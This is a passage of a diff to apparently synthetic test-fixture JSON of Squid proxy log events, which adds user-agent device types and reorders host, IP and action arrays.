AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -444,8 +450,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "www.example.org" + "www.example.org", + "www5.example.com" ], "related.ip": [ "10.207.249.121", @@ -489,6 +495,7 @@ "url.top_level_domain": "com", "user.name": "tsed", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -515,8 +522,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.org", - "internal.example.net" + "internal.example.net", + "example.org" ], "related.ip": [ "10.34.9.93", @@ -558,6 +565,7 @@ "url.top_level_domain": "org", "user.name": "umdo", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -584,12 +592,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.org", - "mail.example.net" + "mail.example.net", + "example.org" ], "related.ip": [ - "10.90.131.186", - "10.30.216.41" + "10.30.216.41", + "10.90.131.186" ], "related.user": [ "saute" @@ -599,8 +607,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "HEAD", - "accept" + "accept", + "HEAD" ], "rsa.misc.content_type": "undeo", "rsa.misc.result_code": "quu", @@ -630,6 +638,7 @@ "url.top_level_domain": "org", "user.name": "saute", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -660,8 +669,8 @@ "www5.example.org" ], "related.ip": [ - "10.203.172.203", - "10.8.88.110" + "10.8.88.110", + "10.203.172.203" ], "related.user": [ "Nemoeni" @@ -703,6 +712,7 @@ "url.top_level_domain": "org", "user.name": "Nemoeni", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -773,6 +783,7 @@ "url.top_level_domain": "org", "user.name": "aliq", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -799,12 +810,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.net", - "example.net" + "example.net", + "internal.example.net" ], "related.ip": [ - "10.201.76.240", - "10.210.74.24" + "10.210.74.24", + "10.201.76.240" ], "related.user": [ "uines" @@ -844,6 +855,7 @@ "url.top_level_domain": "net", "user.name": "uines", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -878,8 +890,8 @@ ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "COPY", - "deny" + "deny", + "COPY" ], "rsa.misc.content_type": "eli", "rsa.misc.result_code": "tatn", @@ -911,6 +923,7 @@ "url.top_level_domain": "org", "user.name": "xeac", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -982,6 +995,7 @@ "url.top_level_domain": "org", "user.name": "ipitla", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -1053,6 +1067,7 @@ "url.top_level_domain": "org", "user.name": "aturve", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -1083,16 +1098,16 @@ "internal.example.net" ], "related.ip": [ - "10.249.213.83", - "10.164.250.63" + "10.164.250.63", + "10.249.213.83" ], "related.user": [ "itame" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "accept", - "PROPFIND" + "PROPFIND", + "accept" ], "rsa.misc.content_type": "asun", "rsa.misc.result_code": "lit", @@ -1124,6 +1139,7 @@ "url.top_level_domain": "net", "user.name": "itame", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -1150,12 +1166,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "www5.example.net" + "www5.example.net", + "api.example.net" ], "related.ip": [ - "10.61.242.75", - "10.236.248.65" + "10.236.248.65", + "10.61.242.75" ], "related.user": [ "iquidex" @@ -1198,6 +1214,7 @@ "url.top_level_domain": "net", "user.name": "iquidex", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1236,8 +1253,8 @@ ], "rsa.internal.messageid": "PUT", "rsa.misc.action": [ - "block", - "PUT" + "PUT", + "block" ], "rsa.misc.content_type": "eprehend", "rsa.misc.result_code": "boN", @@ -1269,6 +1286,7 @@ "url.top_level_domain": "com", "user.name": "etdol", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1299,8 +1317,8 @@ "internal.example.net" ], "related.ip": [ - "10.89.201.140", - "10.49.92.179" + "10.49.92.179", + "10.89.201.140" ], "related.user": [ "isnisiu" @@ -1310,8 +1328,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "GET" + "GET", + "accept" ], "rsa.misc.content_type": "tcons", "rsa.misc.result_code": "tsu", @@ -1343,6 +1361,7 @@ "url.top_level_domain": "net", "user.name": "isnisiu", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1369,12 +1388,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "api.example.org" + "api.example.org", + "mail.example.net" ], "related.ip": [ - "10.235.7.92", - "10.90.86.89" + "10.90.86.89", + "10.235.7.92" ], "related.user": [ "lapar" @@ -1414,6 +1433,7 @@ "url.top_level_domain": "org", "user.name": "lapar", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -1444,16 +1464,16 @@ "www5.example.net" ], "related.ip": [ - "10.14.211.43", - "10.14.48.16" + "10.14.48.16", + "10.14.211.43" ], "related.user": [ "volupt" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "cancel", - "PROPFIND" + "PROPFIND", + "cancel" ], "rsa.misc.content_type": "Utenima", "rsa.misc.result_code": "uiinea", @@ -1485,6 +1505,7 @@ "url.top_level_domain": "org", "user.name": "volupt", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -1511,8 +1532,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.net", - "example.com" + "example.com", + "internal.example.net" ], "related.ip": [ "10.93.123.174", @@ -1525,8 +1546,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "CONNECT", - "block" + "block", + "CONNECT" ], "rsa.misc.content_type": "iusmodi", "rsa.misc.result_code": "etcons", @@ -1558,6 +1579,7 @@ "url.top_level_domain": "net", "user.name": "reetdolo", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -1629,6 +1651,7 @@ "url.top_level_domain": "net", "user.name": "tlab", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -1655,20 +1678,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.com", - "api.example.net" + "api.example.net", + "mail.example.com" ], "related.ip": [ - "10.27.58.92", - "10.93.220.10" + "10.93.220.10", + "10.27.58.92" ], "related.user": [ "qui" ], "rsa.internal.messageid": "PROPATCH", "rsa.misc.action": [ - "PROPATCH", - "accept" + "accept", + "PROPATCH" ], "rsa.misc.content_type": "squirati", "rsa.misc.result_code": "Nemoenim", @@ -1700,6 +1723,7 @@ "url.top_level_domain": "net", "user.name": "qui", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1726,12 +1750,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "example.net" + "example.net", + "www.example.net" ], "related.ip": [ - "10.213.144.249", - "10.135.217.12" + "10.135.217.12", + "10.213.144.249" ], "related.user": [ "ntexplic" @@ -1771,6 +1795,7 @@ "url.top_level_domain": "net", "user.name": "ntexplic", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1797,8 +1822,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "internal.example.com" + "internal.example.com", + "mail.example.net" ], "related.ip": [ "10.233.239.112", @@ -1842,6 +1867,7 @@ "url.top_level_domain": "net", "user.name": "mquelau", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -1868,8 +1894,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "internal.example.org" + "internal.example.org", + "example.com" ], "related.ip": [ "10.21.169.127", @@ -1882,8 +1908,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "CONNECT", - "accept" + "accept", + "CONNECT" ], "rsa.misc.content_type": "seq", "rsa.misc.result_code": "edic", @@ -1915,6 +1941,7 @@ "url.top_level_domain": "org", "user.name": "ice", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1941,20 +1968,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "api.example.com" + "api.example.com", + "www.example.net" ], "related.ip": [ - "10.17.215.111", - "10.69.139.26" + "10.69.139.26", + "10.17.215.111" ], "related.user": [ "edqui" ], "rsa.internal.messageid": "LOCK", "rsa.misc.action": [ - "block", - "LOCK" + "LOCK", + "block" ], "rsa.misc.content_type": "volupta", "rsa.misc.result_code": "veli", @@ -1986,6 +2013,7 @@ "url.top_level_domain": "net", "user.name": "edqui", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2016,16 +2044,16 @@ "www5.example.org" ], "related.ip": [ - "10.104.80.189", - "10.10.213.83" + "10.10.213.83", + "10.104.80.189" ], "related.user": [ "onsecte" ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "accept", - "COPY" + "COPY", + "accept" ], "rsa.misc.content_type": "onulam", "rsa.misc.result_code": "ugiat", @@ -2057,6 +2085,7 @@ "url.top_level_domain": "org", "user.name": "onsecte", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2083,8 +2112,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.org", - "example.org" + "example.org", + "api.example.org" ], "related.ip": [ "10.125.131.91", @@ -2095,8 +2124,8 @@ ], "rsa.internal.messageid": "UNLOCK", "rsa.misc.action": [ - "block", - "UNLOCK" + "UNLOCK", + "block" ], "rsa.misc.content_type": "emUteni", "rsa.misc.result_code": "utlab", @@ -2126,6 +2155,7 @@ "url.top_level_domain": "org", "user.name": "isis", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -2195,6 +2225,7 @@ "url.top_level_domain": "com", "user.name": "oraincid", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -2221,12 +2252,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "mail.example.com" + "mail.example.com", + "api.example.net" ], "related.ip": [ - "10.0.98.205", - "10.76.110.144" + "10.76.110.144", + "10.0.98.205" ], "related.user": [ "upt" @@ -2269,6 +2300,7 @@ "url.top_level_domain": "net", "user.name": "upt", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -2340,6 +2372,7 @@ "url.top_level_domain": "org", "user.name": "xeaco", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -2369,8 +2402,8 @@ "internal.example.org" ], "related.ip": [ - "10.27.44.4", - "10.154.53.249" + "10.154.53.249", + "10.27.44.4" ], "related.user": [ "autodit" @@ -2410,6 +2443,7 @@ "url.top_level_domain": "org", "user.name": "autodit", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -2481,6 +2515,7 @@ "url.top_level_domain": "net", "user.name": "reetd", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -2507,8 +2542,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "www5.example.com" + "www5.example.com", + "mail.example.net" ], "related.ip": [ "10.61.92.2", @@ -2552,6 +2587,7 @@ "url.top_level_domain": "com", "user.name": "atu", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2589,8 +2625,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "allow", - "GET" + "GET", + "allow" ], "rsa.misc.content_type": "numquam", "rsa.misc.result_code": "temUt", @@ -2620,6 +2656,7 @@ "url.registered_domain": "example.net", "url.top_level_domain": "net", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -2691,6 +2728,7 @@ "url.top_level_domain": "net", "user.name": "Duisa", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2721,16 +2759,16 @@ "www5.example.net" ], "related.ip": [ - "10.0.157.225", - "10.11.83.126" + "10.11.83.126", + "10.0.157.225" ], "related.user": [ "atu" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "PROPFIND", - "deny" + "deny", + "PROPFIND" ], "rsa.misc.content_type": "tempor", "rsa.misc.result_code": "remipsum", @@ -2762,6 +2800,7 @@ "url.top_level_domain": "net", "user.name": "atu", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2833,6 +2872,7 @@ "url.top_level_domain": "com", "user.name": "onse", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -2859,12 +2899,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.net", - "api.example.com" + "api.example.com", + "www5.example.net" ], "related.ip": [ - "10.102.215.23", - "10.20.28.92" + "10.20.28.92", + "10.102.215.23" ], "related.user": [ "ntexpl" @@ -2906,6 +2946,7 @@ "url.top_level_domain": "net", "user.name": "ntexpl", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -2975,6 +3016,7 @@ "url.top_level_domain": "net", "user.name": "tionula", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -3001,8 +3043,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.com", - "api.example.com" + "api.example.com", + "internal.example.com" ], "related.ip": [ "10.177.238.45", @@ -3013,8 +3055,8 @@ ], "rsa.internal.messageid": "DELETE", "rsa.misc.action": [ - "allow", - "DELETE" + "DELETE", + "allow" ], "rsa.misc.content_type": "acom", "rsa.misc.result_code": "metco", @@ -3046,6 +3088,7 @@ "url.top_level_domain": "com", "user.name": "rsp", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3076,8 +3119,8 @@ "example.com" ], "related.ip": [ - "10.101.85.169", - "10.46.77.76" + "10.46.77.76", + "10.101.85.169" ], "related.user": [ "liquid" @@ -3120,6 +3163,7 @@ "url.top_level_domain": "org", "user.name": "liquid", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3150,8 +3194,8 @@ "www5.example.org" ], "related.ip": [ - "10.24.54.129", - "10.231.7.209" + "10.231.7.209", + "10.24.54.129" ], "related.user": [ "eavol" @@ -3192,6 +3236,7 @@ "url.top_level_domain": "net", "user.name": "eavol", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3218,12 +3263,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.com", - "api.example.org" + "api.example.org", + "www.example.com" ], "related.ip": [ - "10.77.129.175", - "10.121.163.5" + "10.121.163.5", + "10.77.129.175" ], "related.user": [ "BCS" @@ -3265,6 +3310,7 @@ "url.top_level_domain": "org", "user.name": "BCS", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3291,8 +3337,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.com", - "mail.example.com" + "mail.example.com", + "www.example.com" ], "related.ip": [ "10.116.146.114", @@ -3336,6 +3382,7 @@ "url.top_level_domain": "com", "user.name": "obea", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -3366,16 +3413,16 @@ "internal.example.net" ], "related.ip": [ - "10.244.108.135", - "10.217.222.99" + "10.217.222.99", + "10.244.108.135" ], "related.user": [ "amvolu" ], "rsa.internal.messageid": "NONE", "rsa.misc.action": [ - "block", - "NONE" + "NONE", + "block" ], "rsa.misc.content_type": "tobeatae", "rsa.misc.result_code": "tion", @@ -3407,6 +3454,7 @@ "url.top_level_domain": "net", "user.name": "amvolu", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -3433,8 +3481,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "api.example.org" + "api.example.org", + "www.example.net" ], "related.ip": [ "10.150.198.112", @@ -3478,6 +3526,7 @@ "url.top_level_domain": "org", "user.name": "mexer", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -3508,8 +3557,8 @@ "www5.example.org" ], "related.ip": [ - "10.45.54.107", - "10.45.114.111" + "10.45.114.111", + "10.45.54.107" ], "related.user": [ "nse" @@ -3518,8 +3567,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "POST" + "POST", + "accept" ], "rsa.misc.content_type": "mdolors", "rsa.misc.result_code": "edictasu", @@ -3549,6 +3598,7 @@ "url.top_level_domain": "org", "user.name": "nse", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -3620,6 +3670,7 @@ "url.top_level_domain": "net", "user.name": "untutlab", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": 